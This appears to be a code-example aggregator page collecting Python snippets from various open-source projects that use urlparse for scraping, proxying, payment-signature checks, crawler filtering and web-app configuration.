File: io.py Project: yutiansut/orange3

 def __init__(self, filename):
     filename = filename.strip()
     if not urlparse(filename).scheme:
         filename = 'http://' + filename
     super().__init__(filename)

Example #38

0

Show file

File: baidu_novels.py Project: Chaser-Z/read-python

async def data_extraction_for_web_baidu(client, html):
    with async_timeout.timeout(20):
        try:
            # 获取一段h5
            url = html.select('h3.t a')[0].get('href', None)
            # 获取href标签内容  -
            # 首先 - html.select('h3.t a')[0]
            # < a
            # data - click = "{
            # 'F': '778317EA',
            # 'F1': '9D73F1E4',
            # 'F2': '4DA6DD6B',
            # 'F3': '54E5363F',
            # 'T': '1497109660',
            # 'y': 'A7BFAFBF'
            #
            # }" href="
            # http: // www.baidu.com / link?url = w2bV3ST9FFL3f39PGG6VUhT10aqZ1GNZrhWa5BIclVak7hYZEh1wGiTsvrGYJgXJEAPNoPfS7x0X4xK9nLDzJK
            # " target="
            # _blank
            # "><em>择天记</em>,<em>择天记</em>最新章节,<em>择天记</em>无弹窗,88读书网</a>

            # 然后 - get('href', None)
            # http: // www.baidu.com / link?url = w2bV3ST9FFL3f39PGG6VUhT10aqZ1GNZrhWa5BIclVak7hYZEh1wGiTsvrGYJgXJEAPNoPfS7x0X4xK9nLDzJK

            real_url = await get_real_url(client=client,
                                          url=url) if url else None
            if real_url:
                netloc = urlparse(str(real_url)).netloc
                # >> > import urlparse
                # >> > url = urlparse.urlparse('http://www.baidu.com/index.php?username=guol')
                # >> > print
                # url
                # ParseResult(scheme='http', netloc='www.baidu.com', path='/index.php', params='', query='username=guol',
                #             fragment='')
                # >> > print
                # url.netloc
                # www.baidu.com
                if 'baidu' in str(real_url) or netloc in BLACK_DOMAIN:
                    return None
                #print('--------------------')
                #print(RULES.keys())
                is_parse = 1 if netloc in RULES.keys() else 0
                title = html.select('h3.t a')[0].get_text()
                # time = re.findall(r'\d+-\d+-\d+', source)
                # time = time[0] if time else None
                timestamp = 0
                time = ""
                # if time:
                #     try:
                #         time_list = [int(i) for i in time.split('-')]
                #         timestamp = arrow.get(time_list[0], time_list[1], time_list[2]).timestamp
                #     except Exception as e:
                #         LOGGER.exception(e)
                #         timestamp = 0
                return {
                    'title': title,
                    'url': str(real_url).replace('index.html', ''),
                    'time': time,
                    'is_parse': is_parse,
                    'timestamp': timestamp,
                    'netloc': netloc
                }
            else:
                return None
        except Exception as e:
            LOGGER.exception(e)
            return None

Example #39

0

Show file

 def make_button(i, url):
     return '%d - %s' % (i + 1, urlparse(url).hostname)

Example #40

0

Show file

File: build_gcloud_directory.py Project: michaelisj/scripts

 def extract_params(fileName, paramsDict):
     params = urlparse(paramsDict['sourceUrl'])
     path = os.path.split(params.path)[-1]
     return list(os.path.split(fileName)) + [path]

Example #41

0

Show file

File: __init__.py Project: sinida/machine

def conform(srcjson, destdir, extras):
    ''' Python wrapper for openaddresses-conform.
    
        Return a ConformResult object:

          processed: URL of processed data CSV
          path: local path to CSV of processed data
          geometry_type: typically Point or Polygon
          elapsed: elapsed time as timedelta object
          output: subprocess output as string
        
        Creates and destroys a subdirectory in destdir.
    '''
    start = datetime.now()
    source, _ = splitext(basename(srcjson))
    workdir = mkdtemp(prefix='conform-', dir=destdir)
    
    with open(srcjson, 'r') as src_file:
        data = json.load(src_file)
        data.update(extras)
    
    #
    # The cached data will be a local path.
    #
    scheme, _, cache_path, _, _, _ = urlparse(extras.get('cache', ''))
    if scheme == 'file':
        copy(cache_path, workdir)

    source_urls = data.get('cache')
    if not isinstance(source_urls, list):
        source_urls = [source_urls]

    task1 = URLDownloadTask(source)
    downloaded_path = task1.download(source_urls, workdir)
    _L.info("Downloaded to %s", downloaded_path)

    task2 = DecompressionTask.from_type_string(data.get('compression'))
    names = elaborate_filenames(data.get('conform', {}).get('file', None))
    decompressed_paths = task2.decompress(downloaded_path, workdir, names)
    _L.info("Decompressed to %d files", len(decompressed_paths))

    task3 = ExcerptDataTask()
    try:
        conform = data.get('conform', {})
        data_sample, geometry_type = task3.excerpt(decompressed_paths, workdir, conform)
        _L.info("Sampled %d records", len(data_sample))
    except Exception as e:
        _L.warning("Error doing excerpt; skipping", exc_info=True)
        data_sample = None
        geometry_type = None

    task4 = ConvertToCsvTask()
    try:
        csv_path, addr_count = task4.convert(data, decompressed_paths, workdir)
        _L.info("Converted to %s with %d addresses", csv_path, addr_count)
    except Exception as e:
        _L.warning("Error doing conform; skipping", exc_info=True)
        csv_path, addr_count = None, 0

    out_path = None
    if csv_path is not None and exists(csv_path):
        move(csv_path, join(destdir, 'out.csv'))
        out_path = realpath(join(destdir, 'out.csv'))

    rmtree(workdir)
    
    sharealike_flag = conform_sharealike(data.get('license'))
    attr_flag, attr_name = conform_attribution(data.get('license'), data.get('attribution'))

    return ConformResult(data.get('processed', None),
                         data_sample,
                         data.get('website'),
                         conform_license(data.get('license')),
                         geometry_type,
                         addr_count,
                         out_path,
                         datetime.now() - start,
                         sharealike_flag,
                         attr_flag,
                         attr_name)

Example #42

0

Show file

File: alipay.py Project: Kimball-qq/SXshop_01

        if signer.verify(digest, decodebytes(signature.encode("utf8"))):
            return True
        return False

    def verify(self, data, signature):
        if "sign_type" in data:
            sign_type = data.pop("sign_type")
        # 排序后的字符串
        unsigned_items = self.ordered_data(data)
        message = "&".join(u"{}={}".format(k, v) for k, v in unsigned_items)
        return self._verify(message, signature)


if __name__ == "__main__":
    return_url = 'https://openapi.alipay.com/gateway.do?timestamp=2013-01-01 08:08:08&method=alipay.trade.page.pay&app_id=16388&sign_type=RSA2&sign=ERITJKEIJKJHKKKKKKKHJEREEEEEEEEEEE&version=1.0&charset=GBK&biz_content=AlipayTradePageCreateandpayModel'
    o = urlparse(return_url)
    query = parse_qs(o.query)
    processed_query = {}
    ali_sign = query.pop("sign")[0]


# 测试用例
    alipay = AliPay(
        # 沙箱里面的appid值
        appid="2021000116669532",
        #notify_url是异步的url
        app_notify_url="http://39.103.172.179:8000/alipay/return/",
        # 我们自己商户的密钥
        app_private_key_path="../trade/keys/private_key_2048.txt",
        # 支付宝的公钥
        alipay_public_key_path="../trade/keys/ali_public_key_2048.txt",  # 支付宝的公钥，验证支付宝回传消息使用，不是你自己的公钥,

Example #43

0

Show file

File: final_google_scrapper.py Project: sfgrahman/google-search-scrapper

    def parse_links(self, html, keyword):
        links_title = []
        total_count = []
        registration_date_latest = []
        social_count = 0
        q_a_count = 0
        forum_count = 0
        affiliate_count = 0
        other_count = 0
        root_count = 0
        page_count = 0
        below_1 = 0
        below_2 = 0
        more_than = 0
        registration_date = []
        soup = BeautifulSoup(html, "html.parser")
        try:
            snippet = soup.select_one(".ifM9O").find('h2', class_="bNg8Rb")
            if snippet:
                snipper_string = "Yes"
            else:
                snipper_string = "No"
        except Exception:
            snipper_string = "No"

        for title in soup.find_all("p", class_='nVcaUb'):
            try:
                search_suggestion = title.get_text()
                if search_suggestion.startswith("best") or search_suggestion.endswith("review") or \
                        search_suggestion.endswith("reviews"):
                    columns = ["Search Keywords", "Search Suggestion Result"]
                    suggestion_result = [keyword, search_suggestion]
                    # Create a zip object from two lists
                    searchObj = zip(columns,  suggestion_result)
                    # Create a dictionary from zip object
                    seachofWords = dict(searchObj)
                    # print(registration_date)
                    x = mycol_3.insert_one(seachofWords)
            except Exception:
                pass
        for item in soup.find_all("div", class_='r'):
            rows = item.find('a')
            try:
                title = rows.find('h3').get_text()
            except Exception:
                title = ""
            try:
                url = rows.get('href')
            except Exception:
                url = ""
            links_title.append([title, url])

        for i in range(len(links_title)):
            ext = tldextract.extract(links_title[i][1])
            url = ext.domain + "." + ext.suffix
            try:
                w = whois.whois(url)
                try:
                    start_date = w.creation_date[0]
                    registration_date.extend([url, datetime.datetime.strptime(str(start_date), '%Y-%m-%d %H:%M:%S').date().strftime("%m/%d/%Y")])
                    registration_date_latest.append(datetime.datetime.strptime(str(start_date), '%Y-%m-%d %H:%M:%S').
                                                    date())
                except:
                    start_date = w.creation_date
                    registration_date.extend([url, datetime.datetime.strptime(str(start_date), '%Y-%m-%d %H:%M:%S').date().strftime("%m/%d/%Y")])
                    registration_date_latest.append(datetime.datetime.strptime(str(start_date), '%Y-%m-%d %H:%M:%S').
                                                    date())
            except:
                creation_date = ''
                registration_date.extend([url, creation_date])

            try:
                now = datetime.datetime.now()
                start = datetime.datetime.strptime(str(start_date), '%Y-%m-%d %H:%M:%S').date()
                ends = datetime.datetime.strptime(str(now), '%Y-%m-%d %H:%M:%S.%f').date()
                diff = relativedelta(ends, start)
                if diff.years < 1:
                    below_1 += 1
                elif diff.years == 1:
                    below_2 += 1
                else:
                    more_than += 1
            except:
                pass

            root_page = urlparse(links_title[i][1]).path
            if root_page and root_page != '/':
                page_count += 1
            else:
                root_count += 1

            check_social_share = pd.Series(social_share)
            check_q = pd.Series(qa_site)
            if ext.domain in check_social_share.values:
                social_count += 1
            elif ext.domain in check_q.values or ext.subdomain in check_q:
                q_a_count += 1
            else:
                aff_match = [True for match in affiliate if match in links_title[i][0].lower()]
                f_match = [True for match in forum if match in links_title[i][1]]
                if True in f_match or any(regex.match(links_title[i][1]) for regex in regexes_forum):
                    forum_count += 1
                    subdomain_remove_www = ext.subdomain.replace("www", "")
                    if subdomain_remove_www:
                        subdomain_remove_www = subdomain_remove_www.replace(".", "")
                        subdomain = subdomain_remove_www + "."
                    else:
                        subdomain = ""
                    forum_url = subdomain + ext.domain + "." + ext.suffix
                    forum_links.append(forum_url)
                elif True in aff_match:
                    affiliate_count += 1
                else:
                    other_count += 1
            if i == len(links_title) - 1:
                max_r = 11 - len(links_title)
                for mr in range(0, max_r):
                    value_empty = ""
                    url = ""
                    registration_date.extend([url, value_empty])
                total_count = [keyword, social_count, q_a_count, forum_count, affiliate_count, other_count,
                               snipper_string, root_count, page_count, below_1, below_2, more_than]
                total_count.extend(registration_date)
                if registration_date_latest:
                    latest_date = max(registration_date_latest).strftime("%m/%d/%Y")
                    # oldest_date = min(registration_date_latest).strftime("%m/%d/%Y")
                else:
                    latest_date = ""
                    # oldest_date = ""
                total_count.extend([latest_date])
                # self.analysis_data.append(total_count)
                final_url_links = list(dict.fromkeys(forum_links))
                for url_link in final_url_links:
                    myquery_link = {"Forum Url": url_link}
                    mydoc_link = mycol_2.find_one(myquery_link)
                    if mydoc_link is None:
                        # print(url_link)
                        columns_fourms = ["Forum Url"]
                        forum_final_url_links = [url_link]
                        # Create a zip object from two lists
                        forumbObj = zip(columns_fourms, forum_final_url_links)

                        # Create a dictionary from zip object
                        forumOfWords = dict(forumbObj)
                        # print(registration_date)
                        x = mycol_2.insert_one(forumOfWords)
                columns = ["Search Keywords", "Social Sharing Site", "Q/A Site", "Forum",
                           "Affiliate Site", "Other", "Snippet", "Root", "Page",
                           "Below 1", "Below 2", "More than", "Site1 Root", "Site1",
                           "Site2 Root", "Site2", "Site3 Root", "Site3", "Site4 Root", "Site4", "Site5 Root", "Site5",
                           "Site6 Root", "Site6", "Site7 Root", "Site7", "Site8 Root", "Site8", "Site9 Root", "Site9",
                           "Site10 Root", "Site10", "Site11 Root", "Site11", "Latest Registration Date"]
                # Create a zip object from two lists
                zipbObj = zip(columns, total_count)

                # Create a dictionary from zip object
                dictOfWords = dict(zipbObj)
                #print(registration_date)
                x = mycol.insert_one(dictOfWords)

Example #44

0

Show file

File: views.py Project: iobis/geonode

def proxy(request, url=None, response_callback=None,
          sec_chk_hosts=True, sec_chk_rules=True, timeout=None,
          allowed_hosts=[], **kwargs):
    # Request default timeout
    if not timeout:
        timeout = TIMEOUT

    # Security rules and settings
    PROXY_ALLOWED_HOSTS = getattr(settings, 'PROXY_ALLOWED_HOSTS', ())

    # Sanity url checks
    if 'url' not in request.GET and not url:
        return HttpResponse("The proxy service requires a URL-encoded URL as a parameter.",
                            status=400,
                            content_type="text/plain"
                            )

    raw_url = url or request.GET['url']
    raw_url = urljoin(
        settings.SITEURL,
        raw_url) if raw_url.startswith("/") else raw_url
    url = urlsplit(raw_url)
    scheme = str(url.scheme)
    locator = str(url.path)
    if url.query != "":
        locator += f"?{url.query}"
    if url.fragment != "":
        locator += f"#{url.fragment}"

    # White-Black Listing Hosts
    site_url = urlsplit(settings.SITEURL)
    if sec_chk_hosts and not settings.DEBUG:

        # Attach current SITEURL
        if site_url.hostname not in PROXY_ALLOWED_HOSTS:
            PROXY_ALLOWED_HOSTS += (site_url.hostname, )

        # Attach current hostname
        if check_ogc_backend(geoserver.BACKEND_PACKAGE):
            from geonode.geoserver.helpers import ogc_server_settings
            hostname = (
                ogc_server_settings.hostname,
            ) if ogc_server_settings else ()
            if hostname not in PROXY_ALLOWED_HOSTS:
                PROXY_ALLOWED_HOSTS += hostname

        # Check OWS regexp
        if url.query and ows_regexp.match(url.query):
            ows_tokens = ows_regexp.match(url.query).groups()
            if len(ows_tokens) == 4 and 'version' == ows_tokens[0] and StrictVersion(
                    ows_tokens[1]) >= StrictVersion("1.0.0") and StrictVersion(
                        ows_tokens[1]) <= StrictVersion("3.0.0") and ows_tokens[2].lower() in (
                            'getcapabilities') and ows_tokens[3].upper() in ('OWS', 'WCS', 'WFS', 'WMS', 'WPS', 'CSW'):
                if url.hostname not in PROXY_ALLOWED_HOSTS:
                    PROXY_ALLOWED_HOSTS += (url.hostname, )

        # Check Remote Services base_urls
        from geonode.services.models import Service
        for _s in Service.objects.all():
            _remote_host = urlsplit(_s.base_url).hostname
            PROXY_ALLOWED_HOSTS += (_remote_host, )

        if not validate_host(
                url.hostname, PROXY_ALLOWED_HOSTS):
            return HttpResponse("DEBUG is set to False but the host of the path provided to the proxy service"
                                " is not in the PROXY_ALLOWED_HOSTS setting.",
                                status=403,
                                content_type="text/plain"
                                )

    # Security checks based on rules; allow only specific requests
    if sec_chk_rules:
        # TODO: Not yet implemented
        pass

    # Collecting headers and cookies
    headers, access_token = get_headers(request, url, raw_url, allowed_hosts=allowed_hosts)

    # Inject access_token if necessary
    parsed = urlparse(raw_url)
    parsed._replace(path=locator.encode('utf8'))
    if parsed.netloc == site_url.netloc and scheme != site_url.scheme:
        parsed = parsed._replace(scheme=site_url.scheme)

    _url = parsed.geturl()

    # Some clients / JS libraries generate URLs with relative URL paths, e.g.
    # "http://host/path/path/../file.css", which the requests library cannot
    # currently handle (https://github.com/kennethreitz/requests/issues/2982).
    # We parse and normalise such URLs into absolute paths before attempting
    # to proxy the request.
    _url = URL.from_text(_url).normalize().to_text()

    if request.method == "GET" and access_token and 'access_token' not in _url:
        query_separator = '&' if '?' in _url else '?'
        _url = f'{_url}{query_separator}access_token={access_token}'

    _data = request.body.decode('utf-8')

    # Avoid translating local geoserver calls into external ones
    if check_ogc_backend(geoserver.BACKEND_PACKAGE):
        from geonode.geoserver.helpers import ogc_server_settings
        _url = _url.replace(
            f'{settings.SITEURL}geoserver',
            ogc_server_settings.LOCATION.rstrip('/'))
        _data = _data.replace(
            f'{settings.SITEURL}geoserver',
            ogc_server_settings.LOCATION.rstrip('/'))

    response, content = http_client.request(
        _url,
        method=request.method,
        data=_data.encode('utf-8'),
        headers=headers,
        timeout=timeout,
        user=request.user)
    if response is None:
        return HttpResponse(
            content=content,
            reason=content,
            status=500)
    content = response.content or response.reason
    status = response.status_code
    content_type = response.headers.get('Content-Type')

    if status >= 400:
        return HttpResponse(
            content=content,
            reason=content,
            status=status,
            content_type=content_type)

    # decompress GZipped responses if not enabled
    # if content and response and response.getheader('Content-Encoding') == 'gzip':
    if content and content_type and content_type == 'gzip':
        buf = io.BytesIO(content)
        with gzip.GzipFile(fileobj=buf) as f:
            content = f.read()
        buf.close()

    PLAIN_CONTENT_TYPES = [
        'text',
        'plain',
        'html',
        'json',
        'xml',
        'gml'
    ]
    for _ct in PLAIN_CONTENT_TYPES:
        if content_type and _ct in content_type and not isinstance(content, str):
            try:
                content = content.decode()
                break
            except Exception:
                pass

    if response and response_callback:
        kwargs = {} if not kwargs else kwargs
        kwargs.update({
            'response': response,
            'content': content,
            'status': status,
            'content_type': content_type
        })
        return response_callback(**kwargs)
    else:
        # If we get a redirect, let's add a useful message.
        if status and status in (301, 302, 303, 307):
            _response = HttpResponse((f"This proxy does not support redirects. The server in '{url}' "
                                      f"asked for a redirect to '{response.getheader('Location')}'"),
                                     status=status,
                                     content_type=content_type
                                     )
            _response['Location'] = response.getheader('Location')
            return _response
        else:
            def _get_message(text):
                _s = text
                if isinstance(text, bytes):
                    _s = text.decode("utf-8", "replace")
                try:
                    found = re.search('<b>Message</b>(.+?)</p>', _s).group(1).strip()
                except Exception:
                    found = _s
                return found

            return HttpResponse(
                content=content,
                reason=_get_message(content) if status not in (200, 201) else None,
                status=status,
                content_type=content_type)

Example #45

0

Show file

File: crawler.py Project: mohaoqing/Nubility-project2

    def is_valid(self, url):
        """
        Function returns True or False based on whether the url has to be fetched or not. This is a great place to
        filter out crawler traps. Duplicated urls will be taken care of by frontier. You don't need to check for duplication
        in this method
        """
        word_count = 0

        parsed = urlparse(url)

        ##开始Invalid检测
        if parsed.scheme not in {"http", "https"}:
            return False

        if "calendar." in url or "/calendar" in url:
            traps.append(url + '\n\t\tTraps: Calendar included- may create infinite webpages')
            return False

        if len(url.split("/")) > 10 and '..' not in url:
            traps.append(url + "\n\t\tTraps: Recursive paths detected")
            return False

        elif (len(url.split('/')) - len(set(url.split('/'))) > 1) and 'http' not in set(url.split('/')) and '..' not in url:
            traps.append(url + "\n\t\tTraps: Repeat Directories detected")
            return False

        elif len(parsed.query.split("&")) > 2 and '..' not in url:
            traps.append(url + "\n\t\tTraps: Too many queries-may be dynamic page\n")
            return False

        #################
        #判断完成，证明这个valid之后的操作:
        if '.' in parsed.netloc:
            subdomain = parsed.netloc.split(':')[0]
            if 'www' in subdomain.split('.'):
                subdomain = '.'.join(subdomain.split('.')[1:])
            self.subcnt[subdomain] += 1

        downloaded_all_urls.add(url)

        # put all the words in this page into a counter
        # text_string = self.url_data["content"].lower()
        # match_pattern = re.findall(r'\b[a-z]{3,15}\b', str(text_string))
        # word_count = len(match_pattern)
        # for i in match_pattern:
        #     self.cnt[i] += 1
        #
        # # check if this page has most words
        # if word_count > longest_page[1]:
        #     longest_page[0] = url
        #     longest_page[1] = word_count
        #################


        try:
            return ".ics.uci.edu" in parsed.hostname \
                   and not re.match(".*\.(css|js|bmp|gif|jpe?g|ico" + "|png|tiff?|mid|mp2|mp3|mp4" \
                                    + "|wav|avi|mov|mpeg|ram|m4v|mkv|ogg|ogv|pdf" \
                                    + "|ps|eps|tex|ppt|pptx|doc|docx|xls|xlsx|names|data|dat|exe|bz2|tar|msi|bin|7z|psd|dmg|iso|epub|dll|cnf|tgz|sha1" \
                                    + "|thmx|mso|arff|rtf|jar|csv" \
                                    + "|rm|smil|wmv|swf|wma|zip|rar|gz|pdf)$", parsed.path.lower())

        except TypeError:
            print("TypeError for ", parsed)
            return False

Example #46

0

Show file

def create_app(db_file=None):
    """create app."""
    app = FlaskAPI(__name__)
    per_page = int(
        os.getenv('BUKUSERVER_PER_PAGE', str(views.DEFAULT_PER_PAGE)))
    per_page = per_page if per_page > 0 else views.DEFAULT_PER_PAGE
    app.config['BUKUSERVER_PER_PAGE'] = per_page
    url_render_mode = os.getenv('BUKUSERVER_URL_RENDER_MODE',
                                views.DEFAULT_URL_RENDER_MODE)
    if url_render_mode not in ('full', 'netloc'):
        url_render_mode = views.DEFAULT_URL_RENDER_MODE
    app.config['BUKUSERVER_URL_RENDER_MODE'] = url_render_mode
    app.config['SECRET_KEY'] = os.getenv(
        'BUKUSERVER_SECRET_KEY') or os.urandom(24)
    app.config['BUKUSERVER_DISABLE_FAVICON'] = \
        get_bool_from_env_var('BUKUSERVER_DISABLE_FAVICON', True)
    app.config['BUKUSERVER_OPEN_IN_NEW_TAB'] = \
        get_bool_from_env_var('BUKUSERVER_OPEN_IN_NEW_TAB', False)
    app.config['BUKUSERVER_DB_FILE'] = os.getenv(
        'BUKUSERVER_DB_FILE') or db_file
    reverse_proxy_path = os.getenv('BUKUSERVER_REVERSE_PROXY_PATH')
    if reverse_proxy_path:
        if not reverse_proxy_path.startswith('/'):
            print('Warning: reverse proxy path should include preceding slash')
        if reverse_proxy_path.endswith('/'):
            print(
                'Warning: reverse proxy path should not include trailing slash'
            )
        app.config['REVERSE_PROXY_PATH'] = reverse_proxy_path
        if ReverseProxyPrefixFix:
            ReverseProxyPrefixFix(app)
        else:
            raise ImportError('Failed to import ReverseProxyPrefixFix')
    bukudb = BukuDb(dbfile=app.config['BUKUSERVER_DB_FILE'])
    app.app_context().push()
    setattr(flask.g, 'bukudb', bukudb)

    @app.shell_context_processor
    def shell_context():
        """Shell context definition."""
        return {'app': app, 'bukudb': bukudb}

    app.jinja_env.filters['netloc'] = lambda x: urlparse(x).netloc  # pylint: disable=no-member

    Bootstrap(app)
    admin = Admin(app,
                  name='buku server',
                  template_mode='bootstrap3',
                  index_view=views.CustomAdminIndexView(
                      template='bukuserver/home.html', url='/'))
    # routing
    #  api
    tag_api_view = ApiTagView.as_view('tag_api')
    app.add_url_rule('/api/tags',
                     defaults={'tag': None},
                     view_func=tag_api_view,
                     methods=['GET'])
    app.add_url_rule('/api/tags/<tag>',
                     view_func=tag_api_view,
                     methods=['GET', 'PUT'])
    bookmark_api_view = ApiBookmarkView.as_view('bookmark_api')
    app.add_url_rule('/api/bookmarks',
                     defaults={'rec_id': None},
                     view_func=bookmark_api_view,
                     methods=['GET', 'POST', 'DELETE'])
    app.add_url_rule('/api/bookmarks/<int:rec_id>',
                     view_func=bookmark_api_view,
                     methods=['GET', 'PUT', 'DELETE'])
    app.add_url_rule('/api/bookmarks/refresh',
                     'refresh_bookmark',
                     refresh_bookmark,
                     defaults={'rec_id': None},
                     methods=['POST'])
    app.add_url_rule('/api/bookmarks/<int:rec_id>/refresh',
                     'refresh_bookmark',
                     refresh_bookmark,
                     methods=['POST'])
    app.add_url_rule('/api/bookmarks/<int:rec_id>/tiny',
                     'get_tiny_url',
                     get_tiny_url,
                     methods=['GET'])
    app.add_url_rule('/api/network_handle',
                     'network_handle',
                     handle_network,
                     methods=['POST'])
    bookmark_range_api_view = ApiBookmarkRangeView.as_view(
        'bookmark_range_api')
    app.add_url_rule('/api/bookmarks/<int:starting_id>/<int:ending_id>',
                     view_func=bookmark_range_api_view,
                     methods=['GET', 'PUT', 'DELETE'])
    bookmark_search_api_view = ApiBookmarkSearchView.as_view(
        'bookmark_search_api')
    app.add_url_rule('/api/bookmarks/search',
                     view_func=bookmark_search_api_view,
                     methods=['GET', 'DELETE'])
    bookmarklet_view = BookmarkletView.as_view('bookmarklet')
    app.add_url_rule('/bookmarklet',
                     view_func=bookmarklet_view,
                     methods=['GET'])
    #  non api
    admin.add_view(
        views.BookmarkModelView(bukudb,
                                'Bookmarks',
                                page_size=per_page,
                                url_render_mode=url_render_mode))
    admin.add_view(views.TagModelView(bukudb, 'Tags', page_size=per_page))
    admin.add_view(
        views.StatisticView(bukudb, 'Statistic', endpoint='statistic'))
    return app

Example #47

0

Show file

File: user.py Project: CharmingCharm/SDWIIGP

def is_safe_url(target):
	ref_url = urlparse(request.host_url)
	test_url = urlparse(urljoin(request.host_url, target))
	return test_url.scheme in ('http', 'https') and ref_url.netloc == test_url.netloc

Example #48

0

Show file

File: app.py Project: g-braeunlich/binderhub

    def initialize(self, *args, **kwargs):
        """Load configuration settings."""
        super().initialize(*args, **kwargs)
        self.load_config_file(self.config_file)
        # hook up tornado logging
        if self.debug:
            self.log_level = logging.DEBUG
        tornado.options.options.logging = logging.getLevelName(self.log_level)
        tornado.log.enable_pretty_logging()
        self.log = tornado.log.app_log

        self.init_pycurl()

        # initialize kubernetes config
        if self.builder_required:
            try:
                kubernetes.config.load_incluster_config()
            except kubernetes.config.ConfigException:
                kubernetes.config.load_kube_config()
            self.tornado_settings[
                "kubernetes_client"] = self.kube_client = kubernetes.client.CoreV1Api(
                )

        # times 2 for log + build threads
        self.build_pool = ThreadPoolExecutor(self.concurrent_build_limit * 2)
        # default executor for asyncifying blocking calls (e.g. to kubernetes, docker).
        # this should not be used for long-running requests
        self.executor = ThreadPoolExecutor(self.executor_threads)

        jinja_options = dict(autoescape=True, )
        template_paths = [self.template_path]
        base_template_path = self._template_path_default()
        if base_template_path not in template_paths:
            # add base templates to the end, so they are looked up at last after custom templates
            template_paths.append(base_template_path)
        loader = ChoiceLoader([
            # first load base templates with prefix
            PrefixLoader({'templates': FileSystemLoader([base_template_path])},
                         '/'),
            # load all templates
            FileSystemLoader(template_paths)
        ])
        jinja_env = Environment(loader=loader, **jinja_options)
        if self.use_registry and self.builder_required:
            registry = DockerRegistry(parent=self)
        else:
            registry = None

        self.launcher = Launcher(
            parent=self,
            hub_url=self.hub_url,
            hub_url_local=self.hub_url_local,
            hub_api_token=self.hub_api_token,
            create_user=not self.auth_enabled,
        )

        self.event_log = EventLog(parent=self)

        for schema_file in glob(os.path.join(HERE, 'event-schemas', '*.json')):
            with open(schema_file) as f:
                self.event_log.register_schema(json.load(f))

        self.tornado_settings.update({
            "log_function":
            log_request,
            "push_secret":
            self.push_secret,
            "image_prefix":
            self.image_prefix,
            "debug":
            self.debug,
            "launcher":
            self.launcher,
            "appendix":
            self.appendix,
            "ban_networks":
            self.ban_networks,
            "ban_networks_min_prefix_len":
            self.ban_networks_min_prefix_len,
            "build_namespace":
            self.build_namespace,
            "build_image":
            self.build_image,
            "build_node_selector":
            self.build_node_selector,
            "build_pool":
            self.build_pool,
            "sticky_builds":
            self.sticky_builds,
            "log_tail_lines":
            self.log_tail_lines,
            "pod_quota":
            self.pod_quota,
            "per_repo_quota":
            self.per_repo_quota,
            "per_repo_quota_higher":
            self.per_repo_quota_higher,
            "repo_providers":
            self.repo_providers,
            "use_registry":
            self.use_registry,
            "registry":
            registry,
            "traitlets_config":
            self.config,
            "google_analytics_code":
            self.google_analytics_code,
            "google_analytics_domain":
            self.google_analytics_domain,
            "about_message":
            self.about_message,
            "banner_message":
            self.banner_message,
            "extra_footer_scripts":
            self.extra_footer_scripts,
            "jinja2_env":
            jinja_env,
            "build_memory_limit":
            self.build_memory_limit,
            "build_memory_request":
            self.build_memory_request,
            "build_docker_host":
            self.build_docker_host,
            "build_docker_config":
            self.build_docker_config,
            "base_url":
            self.base_url,
            "badge_base_url":
            self.badge_base_url,
            "static_path":
            os.path.join(HERE, "static"),
            "static_url_prefix":
            url_path_join(self.base_url, "static/"),
            "template_variables":
            self.template_variables,
            "executor":
            self.executor,
            "auth_enabled":
            self.auth_enabled,
            "event_log":
            self.event_log,
            "normalized_origin":
            self.normalized_origin,
        })
        if self.auth_enabled:
            self.tornado_settings['cookie_secret'] = os.urandom(32)

        handlers = [
            (r'/metrics', MetricsHandler),
            (r'/versions', VersionHandler),
            (r"/build/([^/]+)/(.+)", BuildHandler),
            (r"/v2/([^/]+)/(.+)", ParameterizedMainHandler),
            (r"/repo/([^/]+)/([^/]+)(/.*)?", LegacyRedirectHandler),
            # for backward-compatible mybinder.org badge URLs
            # /assets/images/badge.svg
            (r'/assets/(images/badge\.svg)', tornado.web.StaticFileHandler, {
                'path': self.tornado_settings['static_path']
            }),
            # /badge.svg
            (r'/(badge\.svg)', tornado.web.StaticFileHandler, {
                'path':
                os.path.join(self.tornado_settings['static_path'], 'images')
            }),
            # /badge_logo.svg
            (r'/(badge\_logo\.svg)', tornado.web.StaticFileHandler, {
                'path':
                os.path.join(self.tornado_settings['static_path'], 'images')
            }),
            # /logo_social.png
            (r'/(logo\_social\.png)', tornado.web.StaticFileHandler, {
                'path':
                os.path.join(self.tornado_settings['static_path'], 'images')
            }),
            # /favicon_XXX.ico
            (r'/(favicon\_fail\.ico)', tornado.web.StaticFileHandler, {
                'path':
                os.path.join(self.tornado_settings['static_path'], 'images')
            }),
            (r'/(favicon\_success\.ico)', tornado.web.StaticFileHandler, {
                'path':
                os.path.join(self.tornado_settings['static_path'], 'images')
            }),
            (r'/(favicon\_building\.ico)', tornado.web.StaticFileHandler, {
                'path':
                os.path.join(self.tornado_settings['static_path'], 'images')
            }),
            (r'/about', AboutHandler),
            (r'/health', HealthHandler, {
                'hub_url': self.hub_url_local
            }),
            (r'/_config', ConfigHandler),
            (r'/', MainHandler),
            (r'.*', Custom404),
        ]
        handlers = self.add_url_prefix(self.base_url, handlers)
        if self.extra_static_path:
            handlers.insert(-1, (re.escape(
                url_path_join(self.base_url, self.extra_static_url_prefix)) +
                                 r"(.*)", tornado.web.StaticFileHandler, {
                                     'path': self.extra_static_path
                                 }))
        if self.auth_enabled:
            oauth_redirect_uri = os.getenv('JUPYTERHUB_OAUTH_CALLBACK_URL') or \
                                 url_path_join(self.base_url, 'oauth_callback')
            oauth_redirect_uri = urlparse(oauth_redirect_uri).path
            handlers.insert(
                -1, (re.escape(oauth_redirect_uri), HubOAuthCallbackHandler))
        self.tornado_app = tornado.web.Application(handlers,
                                                   **self.tornado_settings)

Example #49

0

Show file

def run_app(
    address,
    keystore_path,
    gas_price,
    eth_rpc_endpoint,
    tokennetwork_registry_contract_address,
    secret_registry_contract_address,
    endpoint_registry_contract_address,
    listen_address,
    mapped_socket,
    max_unresponsive_time,
    api_address,
    rpc,
    sync_check,
    console,
    password_file,
    web_ui,
    datadir,
    transport,
    matrix_server,
    network_id,
    environment_type,
    unrecoverable_error_should_crash,
    pathfinding_service_address,
    pathfinding_max_paths,
    config=None,
    extra_config=None,
    **kwargs,
):
    # pylint: disable=too-many-locals,too-many-branches,too-many-statements,unused-argument

    from raiden.app import App

    _assert_sql_version()

    if transport == 'udp' and not mapped_socket:
        raise RuntimeError('Missing socket')

    if datadir is None:
        datadir = os.path.join(os.path.expanduser('~'), '.raiden')

    address_hex = to_normalized_address(address) if address else None
    address_hex, privatekey_bin = prompt_account(address_hex, keystore_path,
                                                 password_file)
    address = to_canonical_address(address_hex)

